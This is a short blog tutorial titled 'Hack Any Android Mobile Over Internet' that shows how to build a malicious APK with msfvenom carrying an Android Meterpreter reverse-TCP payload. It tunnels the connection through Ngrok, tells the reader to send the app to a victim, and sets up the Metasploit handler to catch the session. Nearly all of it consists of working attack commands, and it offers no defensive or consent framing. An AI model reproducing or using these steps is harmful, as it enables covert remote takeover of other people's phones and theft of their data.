Hack Any Android Mobile Over Internet using Metasploit + Ngrok - Jtechcode

Install Ngrok for your platform

Visit Ngrok official site : https://ngrok.com/


Install Metasploit in Termux And Hacking mobile to mobile video uploaded
link : https://youtu.be/QkWk6MHgMbY

Run your Ngrok 

For Kali Linux [ ./ngrok tcp 4444 ]
For Termux [ ./ngrok tcp 4444 ]
For Windows [ ngrok tcp 4444 ]

 Now create payload 

Command : msfvenom -p android/meterpreter/reverse_tcp LHOST= ngrokip LPORT= ngrokport R>appname.apk


  • Run this command and wait for 2 mints.
  • Now payload was created
  • open your [ Metasploit-framework/bin/ ] Folder check your Apk file
  • Now send the Apk file to victim

Now Open Metasploit Framework

  • Open command prompt in this path [ Metasploit-framework/bin/ ]
  • msfconsole (if not work give this command msfconsole.bat )
  • Now Metasploit framework opened
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp 
  • set LHOST localhost
  • set LPORT 4444
  • exploit
  • Now started reverse tcp handler : 4444


Now server waiting for victim interaction. Victim installed and opened the App meterpreter session 1 opened. (successfully hacked )

Now Meterpreter Commands

  • Type 'help' to know all commands.


WiFi + Hacking Gadgets